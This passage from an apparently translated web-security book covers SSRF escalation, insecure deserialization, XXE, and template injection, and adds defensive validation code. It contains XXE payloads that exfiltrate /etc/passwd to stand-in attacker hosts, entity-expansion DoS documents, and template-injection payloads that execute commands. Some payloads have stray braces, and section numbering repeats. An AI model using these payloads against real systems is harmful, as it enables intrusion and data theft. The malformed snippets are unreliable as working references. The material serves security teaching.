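    caller can connect to exactly what was checked (no second resolution),
    or None when the URL is refused."""
    p = urlparse(url)
    if p.scheme not in ALLOWED_SCHEMES:
        return None
    if p.username is not None or p.password is not None:
        return None                         # http://user@host confusion
    host = p.hostname
    if host is None or host.lower() not in ALLOWED_HOSTS:
        return None                         # exact match, not substring
    try:
        addrs = resolve(host)
    except ValueError:
        return None
    for a in addrs:
        if not ipaddress.ip_address(a).is_global:
            return None                     # private, loopback, link-local, reserved
    return addrs

PAYLOADS = [
    "http://trusted-domain.com/page",              # legitimate
    "http://localhost@trusted-domain.com/",        # userinfo trick from the bypass list
    "http://trusted-domain.com.attacker.com/",     # suffix trick
    "http://2130706433/",                          # decimal 127.0.0.1
    "http://169.254.169.254/latest/meta-data/",    # cloud metadata
    "http://172.20.0.1/",                          # private, but not 172.16.x
]

def verdicts(url):
    """(weak_allowlist, weak_blocklist, hardened) for one URL; True = allowed."""
    return (weak_allowlist(url), weak_blocklist(url), hardened_allow(url) is not None)

if __name__ == "__main__":
    for u in PAYLOADS:
        print(u, verdicts(u))
```

Passing a different resolver to hardened_allow models DNS rebinding: when trusted-domain.com answers with 10.0.0.5 the URL is refused even though the name is on the allowlist, which is the check the string-based filters never make.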

Escalating the attack

While basic SSRF can reveal sensitive information, this chapter explores how attackers can escalate their SSRF attacks to achieve full exploitation, from internal network access to remote code execution.

1. Internal Network Exploration

- Goal: Map the internal network, identify open services and ports.
- Techniques:
1. Port Scan: Use SSRF to send requests to different ports on the internal network and determine which ones are open. Open, closed and filtered ports are told apart by response time and by the error the application returns (connection refused versus timeout), even when the body is never shown.
2. Service discovery: Identify services running on open ports (HTTP, FTP, SSH, etc.).
3. Information Discovery: Access internal administration pages, control panels or other interfaces that may reveal sensitive information.
- Example:

http://sitio-vulnerable.com/vulnerabilidad-ssrf?url=http://192.168.0.1:80

2. Attacks on Internal Services

- Objective: Exploit vulnerabilities in identified internal services.
- Techniques:
- Attacks on web services: Inject malicious payloads into SSRF requests to exploit vulnerabilities in internal web applications.
- Database attacks: Accessing internal databases via SSRF and performing malicious SQL queries.
- Attacks on file services: Reading, writing or modifying files on internal servers via SSRF.
- Example:

http://sitio-vulnerable.com/vulnerabilidad-ssrf?url=http://servidor-interno.com?vulnerabilidad-sql?consulta=maliciosa

3. Blind SSRF

- Objective: Exploit SSRF when there is no direct response from the vulnerable server.
- Techniques:
1. Time-based attacks: Send SSRF requests that cause a delay in the vulnerable server's response if the request succeeds.
2. DNS-based attacks: Send SSRF requests to a hostname under a DNS zone controlled by the attacker and analyze the DNS queries to determine whether the SSRF request was made.
3. External request-based attacks: Send SSRF requests to an external server controlled by the attacker and analyze the server logs to determine whether the SSRF request was successful. Burp Collaborator or a self-hosted interactsh instance gives you the DNS and the HTTP callback in one place.

4. Cloud SSRF

- Goal: Exploit SSRF in cloud environments to access instance metadata, cloud services and other APIs.
- Techniques:
1. Instance metadata attacks: Access instance metadata from cloud providers (AWS, Azure, GCP) via SSRF. All three serve it at 169.254.169.254, but Azure requires the header Metadata: true, GCP requires Metadata-Flavor: Google, and AWS IMDSv2 requires a token obtained with a PUT request, so a GET-only SSRF with no header control fails against those configurations.
2. Attacks on cloud services: Accessing cloud services (storage, databases, functions) via SSRF.
3. Attacks on cloud APIs: Exploiting vulnerabilities in cloud provider APIs.

Defenses against SSRF attack escalation

- Input validation: Strictly validate user-supplied URLs to prevent them from pointing to internal resources.
- URL whitelisting: Allow only requests to specific, known URLs.
- Disable unnecessary protocols: Disable protocols such as file://, gopher://, dict:// if they are not needed.
- Web Application Firewall (WAF): Configure the WAF to detect and block SSRF attack patterns.
Automating the attack

While manual detection of SSRF is possible, automation offers significant advantages in terms of efficiency and ability to discover hidden vulnerabilities. This chapter explores how to automate SSRF attacks, from reconnaissance to exploitation.

1. Automated Reconnaissance

- Goal: Identify potential entry points for SSRF in a web application.
- Tools:
1. Web crawlers (Crawlers): Collect URLs and parameters from a web application. Examples: Burp Suite Spider, ZAP Spider.
2. Vulnerability scanners: Search for known SSRF patterns in source code and server responses. Examples: Nuclei, Bandit.
3. Traffic analysis: Inspect network traffic for suspicious requests that may indicate SSRF. Examples: Burp Suite Proxy, Wireshark.
- Example: Use a web crawler to collect all URLs of a web application and then use a vulnerability scanner to scan each page for SSRF patterns.

2. Automated Payload Generation

- Goal: Create custom SSRF payloads to evade filters and maximize impact.
- Tools:
1. SSRF payload generators: Create SSRF payloads based on different obfuscation techniques and protocols. Examples: SSRFmap, Gopherus.
2. Payload lists: Compilations of known and effective SSRF payloads.
- Example: Use an SSRF payload generator to create a payload that uses the gopher:// protocol to access internal resources.

3. Automated Injection and Testing

- Goal: Inject SSRF payloads at identified entry points and verify if they execute.
- Tools:
1. Penetration testing frameworks: Automate injection and testing of SSRF payloads. Examples: Burp Suite Intruder, ZAP Active Scan.
2. Custom scripts: Develop scripts to automate specific tasks, such as payload injection in forms or URL parameters.
- Example: Use Burp Suite Intruder to inject a list of SSRF payloads into a URL parameter and analyze server responses to detect if any request was successfully executed. For blind cases, give every payload a unique callback subdomain so that a later DNS or HTTP hit can be matched to the exact request that triggered it.

4. Automated Monitoring and Alerting

- Goal: Receive real-time notifications when an SSRF vulnerability is discovered or an exploitation attempt is detected.
- Tools:
1. Intrusion detection systems (IDS): Monitor network traffic for SSRF attack patterns. Examples: Snort, Suricata.
2. WAF (Web Application Firewall): Block suspicious requests that may indicate an SSRF attack.
- Example: Configure an IDS to generate alerts when SSRF requests attempting to access internal resources are detected.

Ethical and Legal Considerations

Automating SSRF attacks must be done in a responsible and ethical manner. It is critical to obtain proper permission before testing on third-party systems and to avoid causing damage or disruption.
2.9 - INSECURE DESERIALIZATION #2.9

Insecure deserialization is a vulnerability that occurs when an application deserializes untrusted data and then executes or interprets that data as code. This vulnerability can allow an attacker to execute arbitrary code, modify existing data, or perform additional attacks. Insecure deserialization is one of the most dangerous vulnerabilities in applications that handle serialized data, especially in systems that use objects to exchange information.

Understanding Insecure Deserialization

Serialization is the process of converting an object into a format that can be stored or transmitted and then reconstructed. Deserialization is the reverse process. When an application deserializes data without properly validating its origin or content, it may be exposed to insecure deserialization. The danger comes from formats that encode which classes to instantiate and which methods to run while rebuilding the object (Java's ObjectInputStream, Python's pickle, PHP's unserialize, .NET's BinaryFormatter): the attacker chooses the classes, and "gadget" classes already present on the server do the rest.

Real Examples of Insecure Deserialization

To better understand how insecure deserialization works, let's look at some examples that illustrate its exploitation and possible impacts.

Example 1: Arbitrary Code Execution

Suppose a Java application deserializes objects that are received via an HTTP request. If an attacker can manipulate the contents of those objects, he could introduce malicious code to be executed during the deserialization process.

---------------
import java.io.*;

public class VulnerableApp {
    public static void main(String[] args) {
        try {
            // data.ser is attacker-controlled: any class on the classpath can be instantiated here
            ObjectInputStream ois = new ObjectInputStream(new FileInputStream("data.ser"));
            Object obj = ois.readObject();
            ois.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
---------------

If the data.ser file contains a manipulated object, the attacker can execute arbitrary commands on the server. readObject() runs the readObject, readResolve and readExternal methods of whatever class graph the stream names (and, through gadget chains, whatever those methods call) before any cast on the result is reached, which is why the attack works even though the application never uses obj.

Example 2: Data Manipulation

An application that uses serialized objects to store user information could be exposed to data manipulation. For example, if a serialized object contains a user's role, an attacker could modify the role to gain administrative privileges.

---------------
# Example in Python using pickle
import pickle

class User:
    def __init__(self, username, role):
        self.username = username
        self.role = role

# An attacker can create an object with administrator role
malicious_user = User("attacker", "admin")
serialized_user = pickle.dumps(malicious_user)

# The application deserializes the object without validation.
deserialized_user = pickle.loads(serialized_user)
print(deserialized_user.role)  # Output: admin
---------------

Risks and Consequences

Insecure deserialization vulnerabilities can have serious consequences:

Remote Code Execution (RCE): Attackers can execute arbitrary code on the server, which can lead to compromising the entire system.
Data Manipulation: Data within deserialized objects can be manipulated to escalate privileges or alter critical information.
Unauthorized Access: Attackers can access sensitive data without proper authorization.
Denial of Service (DoS): Deserialization attacks can consume system resources, causing a denial of service.

Preventing Insecure Deserialization

To prevent insecure deserialization, it is essential to implement appropriate security measures:

1. Use of Secure Data Formats: Whenever possible, avoid deserializing native object streams and use plain data formats such as JSON (or XML with external entities disabled, see 2.10). These describe data rather than which classes to instantiate, so parsing them does not lead to code execution by itself.

---------------
import json

# Using JSON instead of pickle
user_data = json.dumps({"username": "user", "role": "user"})
parsed_data = json.loads(user_data)
---------------

2. Input Validation and Sanitization: Validate and sanitize all input data before deserializing it. Make sure that they come from reliable sources and that they comply with the expected formats. Where serialized blobs must round-trip through the client (cookies, hidden form fields), sign them with an HMAC and verify the signature before deserializing, so that only server-produced data is ever parsed.

3. Whitelist Implementation: Use whitelists to control which classes can be deserialized. This helps prevent deserialization of unauthorized or dangerous classes.

---------------
// Java example using a whitelist
ObjectInputStream ois = new ObjectInputStream(new FileInputStream("data.ser")) {
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        if (desc.getName().equals("com.example.SafeClass")) {
            return super.resolveClass(desc);
        } else {
            throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
        }
    }
};
---------------

On Java 9 and later the same control is available without subclassing through ObjectInputFilter (JEP 290): ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter("com.example.SafeClass;!*")) accepts that one class and rejects everything else, and the same filter syntax also caps graph depth and array sizes, which addresses the DoS case above.

4. Use Secure Libraries: Use libraries and frameworks that provide secure deserialization mechanisms. Some modern libraries have built-in security measures to prevent insecure deserialization.

5. Monitoring and Logging: Implement monitoring and logging of deserialization events to detect and respond to suspicious activity.

Insecure deserialization is a critical vulnerability that can have a devastating impact on the security of an application. By understanding how deserialization works and the techniques attackers use to exploit it, you can implement effective security measures to protect your applications. Be sure to use secure data formats, validate and sanitize inputs, implement whitelisting, use secure libraries and monitor deserialization activities.
2.10 - XML EXTERNAL ENTITY (XXE) #2.10

The XML External Entity (XXE) vulnerability occurs when an application that processes XML data does not properly disable external entity resolution within XML inputs. This vulnerability can allow attackers to access local files, perform network requests, and in some cases, execute remote code. XXE is a serious security threat to any application that accepts or manipulates XML data.

Understanding the XXE Vulnerability

Many applications use XML for data transmission (SOAP web services, SAML assertions, RSS feeds, and document formats such as DOCX and SVG). XML documents can contain external entities, which are references to external resources. If these references are not handled correctly, they can be exploited by attackers to extract sensitive information or execute malicious code.

Real Examples of XXE

To understand how the XXE vulnerability works, let's look at some examples that illustrate its exploitation and possible impacts.

Example 1: Reading Local Files

An attacker can inject an external entity into an XML request to read local files on the server.

----------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
----------------

If the application does not disable external entity resolution, the contents of the /etc/passwd file will be included in the server response, provided the response reflects the content of the foo element. Files that are not well-formed XML (binary files, or text containing <) break the parse; the parameter-entity and base64-wrapper tricks shown under XXE payloads later in this chapter exist to work around that.

Example 2: Network Requests (SSRF)

XXE can also be used to make network requests from the affected server, a type of attack known as Server-Side Request Forgery (SSRF).

----------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://attacker.com/malicious" >
]>
<foo>&xxe;</foo>
----------------

In this case, the external entity points to a remote resource. The server makes an HTTP request to the URL specified by the attacker.

Risks and Consequences

XXE vulnerabilities can have serious consequences:

1. Data Exfiltration: Attackers can read sensitive local files and exfiltrate confidential information.
2. Denial of Service (DoS): XXE attacks can be used to exhaust server resources and cause a denial of service.
3. Remote Code Execution (RCE): In some cases, XXE can lead to remote code execution on the server.
4. Network Requests (SSRF): Attackers can make unauthorized network requests from the affected server, accessing internal or external resources.

Preventing the XXE Vulnerability

To prevent the XXE vulnerability, it is crucial to follow best security practices when processing XML data:

1. Disable External Entities: Disable external entity resolution in XML parsers.

----------------
// Java example
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Rejecting the DOCTYPE outright is the strongest setting; the remaining
// features matter when a DTD must be accepted for other reasons.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
----------------

----------------
# Example in Python using defusedxml
# defusedxml.lxml is deprecated upstream; defusedxml.ElementTree exposes the same
# parse() and refuses DOCTYPEs with entities, external references and entity bombs
from defusedxml.lxml import parse

# Parse XML in a safe way
xml_data = parse('data.xml')
----------------

2. Input Validation and Sanitization: Validate and sanitize all XML inputs to ensure that they comply with expected formats and do not contain malicious external entities. The simplest robust rule is to reject any document that contains a DOCTYPE at all, since almost no application needs its clients to supply a DTD.

3. Use of Secure Libraries: Use libraries and frameworks that provide secure XML parsing mechanisms. Some modern libraries have built-in security measures to prevent XXE.

4. Patching and Updating: Keep your libraries and XML parsers updated with the latest security patches to protect against known vulnerabilities.

5. Monitoring and Logging: Implement XML activity monitoring and logging to detect and respond to XXE exploitation attempts.

The XML External Entity (XXE) vulnerability is a critical threat that can compromise the security of an application if not handled properly. By understanding how XXE works and the techniques attackers use to exploit it, you can implement effective security measures to protect your applications. Be sure to disable external entity resolution, validate and sanitize XML inputs, use secure libraries, keep your systems up to date, and monitor XML activities.
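An added Python demonstration, not from the book, of what item 1 above changes: the file-disclosure payload from Example 1 is parsed twice with the standard library's xml.sax, once with external general entities enabled (the setting older Python versions had on by default) and once disabled. The script creates the "secret" file itself in a temporary directory, so the run is offline and harmless; the file name and its contents are assumptions.

```python
import io
import pathlib
import tempfile
import xml.sax
import xml.sax.handler

class TextCollector(xml.sax.handler.ContentHandler):
    """Gathers the character data the parser hands back: this is the part
    of the document a vulnerable application would echo in its response."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

def parse_text(xml_bytes, resolve_external_entities):
    """Parse the document and return its text content. The flag maps to the
    SAX feature external-general-entities, the knob XXE hinges on."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)

def xxe_payload(file_uri):
    """Example 1 from the chapter, with the target file made a parameter."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE foo [\n'
        '  <!ELEMENT foo ANY >\n'
        '  <!ENTITY xxe SYSTEM "%s" >\n'
        ']>\n'
        '<foo>&xxe;</foo>\n' % file_uri
    ).encode()

def demo():
    """Return (text seen with external entities on, text seen with them off)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "secret.txt"          # assumption
        secret.write_text("db_password=s3cret-token")      # constructed content
        payload = xxe_payload(secret.as_uri())
        vulnerable = parse_text(payload, resolve_external_entities=True)
        safe = parse_text(payload, resolve_external_entities=False)
    return vulnerable, safe

if __name__ == "__main__":
    leaked, kept = demo()
    print("external entities ON :", repr(leaked))   # 'db_password=s3cret-token'
    print("external entities OFF:", repr(kept))     # ''
```

With the feature off the entity reference simply expands to nothing, which is the behaviour defusedxml and the Java settings above enforce for every parser configuration rather than relying on one flag.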

Advanced search

XML external entity injection (XXE) vulnerabilities can have serious consequences, allowing attackers to access sensitive files, perform denial-of-service (DoS) attacks and even execute code remotely. This chapter will guide you through the process of finding and exploiting XXE, from identifying entry points to executing malicious payloads.

1. What is XXE?

- XML: Extensible Markup Language used to structure data.
- Entities: Storage units within an XML document that may represent data or references to external data.
- External Entities: Entities that refer to external resources, such as files or URLs.
- XXE Vulnerability: Occurs when an XML parser processes untrusted external entities provided by an attacker.

2. Identifying Entry Points

- Functionalities that process XML: Look for XML file loading forms, APIs that accept XML data, SOAP-based web services, etc.
- Traffic analysis: Use tools such as Burp Suite or ZAP to intercept and analyze requests and responses containing XML.
- Documentation: Review application documentation for mentions of XML or functionality that may be susceptible to XXE.

3. Testing the Vulnerability

- Basic test: Replace an internal entity in the XML with an external entity that references a local file controlled by the attacker (e.g., /etc/passwd).
- Blind XXE: If no direct response is received, use Blind XXE techniques to exfiltrate data through requests to a server controlled by the attacker.
- XXE with DTD (Document Type Definition): Inject an external DTD defining malicious entities to execute more sophisticated attacks.

4. Exploiting XXE

- File exfiltration: Reads sensitive files from the server file system, such as configuration files or passwords.
- SSRF (Server-Side Request Forgery) attacks: Makes requests from the server to other internal or external systems.
- DoS attacks: Injects recursive entities that consume server resources and cause the server to crash.
- Remote Code Execution (RCE): In some cases, XXE can lead to code execution on the server if certain conditions are met.

5. Examples of XXE Payloads

Basic XXE:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>

Blind XXE:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://sitio-atacante.com/malicioso.dtd"> %xxe; ]>

XXE with external DTD:

<!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://sitio-atacante.com/?x=%file;'>"> %eval; %exfiltrate; ]>

6. XXE prevention

- Disable external entity processing: Configure the XML parser not to process external entities.
- Input validation: Strictly validate XML data before processing.
- WAF (Web Application Firewall): Use a WAF to detect and block XXE attack patterns.

92 MILLIONAIRE RECORDS
Additional Considerations

- XXE in SOAP: XXE can be especially dangerous in SOAP-based web services.
- XXE in REST APIs: Some REST APIs that accept XML may also be vulnerable to XXE.
- XXE in mobile applications: Mobile applications that process XML may also be vulnerable.

Bypassing Protection

Developers implement various protection measures to mitigate these attacks, but clever attackers are always looking for ways to bypass these defenses. This chapter explores the techniques and strategies used to overcome XXE protection and exploit these vulnerabilities.

1. Basic Protection and its Limitations

- Disabling external entities: The most basic form of protection is to disable external entity resolution in the XML parser.
- Limitations: This measure can be effective against simple XXE attacks, but does not protect against more sophisticated attacks that use internal entities or evasion techniques.

2. XXE Protection Evasion Techniques

- Internal entities: Use internal entities to define and reference malicious entities within the XML document.
- Denial-of-service (DoS) attacks: Exploit recursive entity expansion to consume server resources and cause a denial of service.
- Parameterized entities: Use parameterized entities to obfuscate the malicious payload and evade security filters.
- Injecting external entities into attributes: Inject external entities into XML attributes instead of elements to avoid detection.
- Use of alternative protocols: Use protocols such as FTP or gopher instead of HTTP to retrieve external entities and avoid security filters.

3. Examples of XXE Protection Evasion

- Evasion of disabling external entities:

XML

<!DOCTYPE foo [
<!ENTITY % localDTD SYSTEM "file:///etc/passwd">
<!ENTITY % payload "<!ENTITY exfil SYSTEM 'http://sitio-atacante.com/?data=%localDTD;'>">
%payload;
]>

- DoS attack with entity expansion:

XML

<!DOCTYPE data [
<!ENTITY a0 "two">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>

- Use of parameterized entities:

XML

<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://sitio-atacante.com/?x=%file;'>">
%eval;
%exfiltrate;
]>

4. Advanced XXE Attack Mitigation

- Entity Whitelisting: Allow only a specific set of known and secure entities.
- Schema validation: Use XML schemas to validate the structure and content of XML documents before processing them.
- Static security analysis (SAST): Use SAST tools to analyze source code for XXE vulnerabilities.
- Dynamic security analysis (DAST): Perform security tests on the running application to detect XXE vulnerabilities.
- WAF (Web Application Firewall): Configure a WAF to detect and block XXE attack patterns.

Final Considerations

Protection against XXE attacks requires a multi-layered approach that combines preventive measures, detection and mitigation. Staying up-to-date on the latest evasion techniques and applying security patches in a timely manner is critical.

Escalating the attack

While exfiltration of sensitive data is a serious risk, XXE attacks can be scaled for even greater impact. This chapter explores the advanced techniques and strategies attackers use to maximize the damage caused by an XXE.

1. Denial of Service (DoS) Attacks

- Objective: Disrupt the normal operation of the application or server.
- Technique: Exploit the ability of XML entities to perform recursive references and consume system resources.
- Example:

XML

<!DOCTYPE data [
<!ENTITY a0 "two">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a1;">
]>
<data>&a3;</data>

2. Remote Code Execution (RCE)

- Goal: Execute arbitrary code on the server that processes the XML.
- Technique: Depends on server configuration and XML libraries used. Some XXE vulnerabilities allow loading external entities from protocols such as FTP or HTTP, which can lead to the inclusion of malicious scripts.
- Example: (Requires specific server configuration)

XML

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://sitio-atacante/script-malicioso.php"> ]>
<foo>&xxe;</foo>

3. File System Attacks

- Goal: Read or modify arbitrary files on the server.
- Technique: Use parameter entities to access local files through protocol wrappers such as file://.
- Example:

XML

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>

4. Internal Network Attacks

- Goal: Scan the internal network behind the vulnerable server.
- Technique: Use parameter entities to make requests to internal services (e.g., databases) or scan ports.

5. Blind XXE

- Objective: Exploit XXE when there is no direct response from the server.
- Technique: Use external entities to send data to a server controlled by the attacker, allowing information about the XML structure and server configuration to be inferred.

Defenses against XXE attack escalation

- Disable external entity processing (DTD): This is the most effective measure.
- Use a secure XML parser: Opt for parsers that do not support external DTDs or parameter entities.
- Input validation: Strictly verify the structure and content of incoming XML documents.
- WAF (Web Application Firewall): Configure rules to detect and block XXE attack patterns.
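The prevention lists in this chapter (disable external entity processing, validate the XML before it is parsed, prefer a parser that does not support DTDs or parameter entities) and the entity-expansion examples above can be combined into one defensive check that runs before any parser sees the document. What follows is an added example and not code from the book: a pre-parse inspector in plain Python (standard library only) that flags DOCTYPE declarations, external and parameter entities, and internal entities whose expansion would exceed a size cap, and hands only clean documents to ElementTree. The sample documents, the attacker.example host and the 100,000-byte cap are constructed assumptions for the demonstration.

```python
import re
from xml.etree import ElementTree as ET


def expansion_bomb(depth=5, width=10):
    """Constructed 'billion laughs' document: each entity references the
    previous one `width` times, so a<depth> expands to 3 * width**depth bytes."""
    decls = ['<!ENTITY a0 "two">']
    for i in range(1, depth + 1):
        decls.append('<!ENTITY a%d "%s">' % (i, ("&a%d;" % (i - 1)) * width))
    return "<!DOCTYPE data [ " + " ".join(decls) + " ]><data>&a%d;</data>" % depth


# Constructed sample documents (not captured traffic): a harmless record, the
# basic and blind (parameter-entity) XXE shapes shown in this chapter, and an
# expansion bomb. attacker.example is a placeholder host.
SAMPLES = {
    "benign": "<data><user>alice</user></data>",
    "basic_xxe": ('<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
                  "<data>&xxe;</data>"),
    "blind_xxe": ('<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM '
                  '"http://attacker.example/evil.dtd"> %xxe; ]><data/>'),
    "expansion": expansion_bomb(),
}

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Internal entity: <!ENTITY name "value">   External: <!ENTITY [%] name SYSTEM|PUBLIC ...
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.-]+)\s+"
    r"(?:(?P<ext>SYSTEM|PUBLIC)|\"(?P<dq>[^\"]*)\"|'(?P<sq>[^']*)')",
    re.IGNORECASE,
)
REF_RE = re.compile(r"&([\w.-]+);")


def estimate_expansion(entities, name, memo, stack):
    """Expanded length of internal entity `name`, following nested references.
    A cycle (direct or indirect recursion) is treated as infinite."""
    if name in stack:
        return float("inf")
    if name in memo:
        return memo[name]
    value = entities.get(name)
    if value is None:                     # undefined or external: nothing to expand here
        return 0
    stack.add(name)
    size = len(REF_RE.sub("", value))    # literal text of the value
    for ref in REF_RE.findall(value):    # plus every entity it references
        size += estimate_expansion(entities, ref, memo, stack)
    stack.discard(name)
    memo[name] = size
    return size


def inspect_xml(xml_text, max_expansion=100_000):
    """Return a list of findings; an empty list means plain data XML."""
    findings = []
    if DOCTYPE_RE.search(xml_text):
        findings.append("doctype")
    entities = {}
    for m in ENTITY_RE.finditer(xml_text):
        name = m.group("name")
        if m.group("param"):
            findings.append("parameter_entity:" + name)
        if m.group("ext"):
            findings.append("external_entity:" + name)
        else:
            entities[name] = m.group("dq") if m.group("dq") is not None else m.group("sq")
    memo = {}
    for name in entities:
        if estimate_expansion(entities, name, memo, set()) > max_expansion:
            findings.append("entity_expansion:" + name)
    return findings


def safe_parse(xml_text):
    """Reject any document with a DTD, external entities or oversized
    entities before the real parser ever sees it."""
    findings = inspect_xml(xml_text)
    if findings:
        raise ValueError("rejected XML: " + ", ".join(findings))
    return ET.fromstring(xml_text)
```

In practice the application-level rule is simpler than the inspector suggests: a data API has no legitimate reason to accept a DTD at all, so the `doctype` finding alone is grounds for rejection. The expansion estimate is kept because, as the evasion section notes, internal entities with no external resolution are enough for the denial-of-service attack.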

Automating the attack

Automating this process allows security researchers and attackers to scale their efforts, discover XXE vulnerabilities more efficiently and perform more sophisticated attacks. This chapter explores the key tools and techniques for automating XXE attacks, from detection to exploitation.

1. Automated XXE Detection

- Goal: Identify web applications and services that are potentially vulnerable to XXE.
- Tools:
  1. Vulnerability scanners: Look for known patterns of XXE vulnerabilities in HTTP requests and responses. Examples: OWASP ZAP, Burp Suite.
  2. Fuzzers: Send specially designed XXE payloads to applications to test their behavior and detect vulnerabilities. Examples: Wfuzz, ffuf.
- Example: Using a vulnerability scanner to automatically scan a web application for signs of XXE vulnerabilities, such as revealing errors in responses or the ability to include external entities in XML documents.

2. Automated Generation of XXE Payloads

- Goal: Create custom XXE payloads for different attack scenarios, such as data exfiltration, remote code execution (RCE) or denial of service (DoS).
- Tools:
  1. XXE payload generators: Create XXE payloads based on predefined templates or on specific parameters. Examples: XXEinjector, xxe-payload-generator.
  2. XXE payload libraries: Collections of ready-to-use XXE payloads tested in different environments.
- Example: Use an XXE payload generator to create a payload that attempts to read the /etc/passwd file of a vulnerable system and send it to a server controlled by the attacker.

3. Automated Injection and Exploitation

- Goal: Inject XXE payloads into vulnerable applications and automate the exploitation process to extract sensitive information, execute commands or cause outages.
- Tools:
  1. XXE Exploitation Frameworks: Provide a set of tools and scripts to automate the injection of XXE payloads and exploitation of vulnerabilities. Examples: XXExploiter, XXEServ.
  2. Custom scripts: Develop your own scripts to automate specific tasks, such as extracting data from files or executing commands via XXE.
- Example: Use an XXE exploit framework to automate the injection of an XXE payload that attempts to execute a command on the vulnerable server operating system.

4. XXE Attack Scaling and Optimization

- Goal: Maximize the impact of XXE attacks by automating tasks such as enumerating files and directories, searching for specific files, or exploiting multiple XXE vulnerabilities in parallel.
- Techniques:
  1. Recursive file search: Use XXE payloads to enumerate files and directories recursively on the server file system.
  2. Massive data exfiltration: Automate the extraction of large amounts of data through multiple XXE payloads.
  3. Parallel exploitation: Use multiple threads or processes to exploit multiple XXE vulnerabilities simultaneously.
- Example: Develop a script that uses XXE to enumerate all files in a specific directory on the vulnerable server and then attempt to download them automatically.

Ethical and Legal Considerations

Automating XXE attacks must be done in a responsible and ethical manner. It is critical to obtain proper permission before testing on third-party systems and to avoid causing unnecessary damage or disruption.

2.10 - TEMPLATE INJECTION

Imagine you commission an artist to paint your portrait, but instead of using your image, they use that of a complete stranger. The result might be a work of art, but it's definitely not what you expected. In the world of web development, Template Injection is like that erroneous portrait: the application works, but the result is unexpected and potentially dangerous.

In essence, Template Injection is a vulnerability that occurs when a web application uses untrusted data to build dynamic templates. If an attacker gains control of this data, they can inject malicious code into the template, which will then be executed by the application with the same privileges as the template.

Why is Template Injection So Dangerous?

Template injection can have devastating consequences for the security of a web application:

- Remote Code Execution (RCE): This is the holy grail of many attackers. It allows them to execute arbitrary commands on the server, giving them full control of the system.
- Information Disclosure: Attackers can use template injection to read sensitive files from the server, such as passwords, API keys or client data.
- Denial of Service (DoS) attacks: They can inject code that overloads the application, making it unusable for legitimate users.

Anatomy of a Template Injection Attack

To understand how template injection works, we must first understand how template engines work. These engines allow developers to create templates with placeholders (variables) that are then populated with dynamic data. For example:

Hello, {{ user_name }}

In this case, {{ user_name }} is a variable that will be replaced by the user's actual name when the template is rendered.

The problem arises when the application does not properly validate and sanitize the data that is inserted into the template. If an attacker can control the value of user_name, they could inject malicious code instead. For example:

{{ 7*7 }}

If the template engine is not protected, it will interpret this expression and display the result (49) on the page. But an attacker could go further and inject more dangerous code, such as:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}{% endfor %}

This payload, designed for the Jinja2 template engine, attempts to execute the id command on the server and display the result on the page.

Examples of Template Injection Payloads

Template injection payloads may vary depending on the engine used. Here are some examples for the most popular engines:

- Twig: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}}
- Jinja2: {{ config.items() }}}
- FreeMarker: <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

How to Protect Yourself from Template Injection

The best defense against template injection is prevention:

- Rigorous Input Validation: Never rely on user-supplied data. Always validate and sanitize inputs before using them in a template.
- Use Secure Templates: Opt for template engines that offer built-in security mechanisms, such as sandboxing or whitelisting of allowed functions.
- Principle of Least Privilege: Limit template permissions so that only necessary resources can be accessed.
- Security Updates: Keep your software up to date to fix known vulnerabilities.
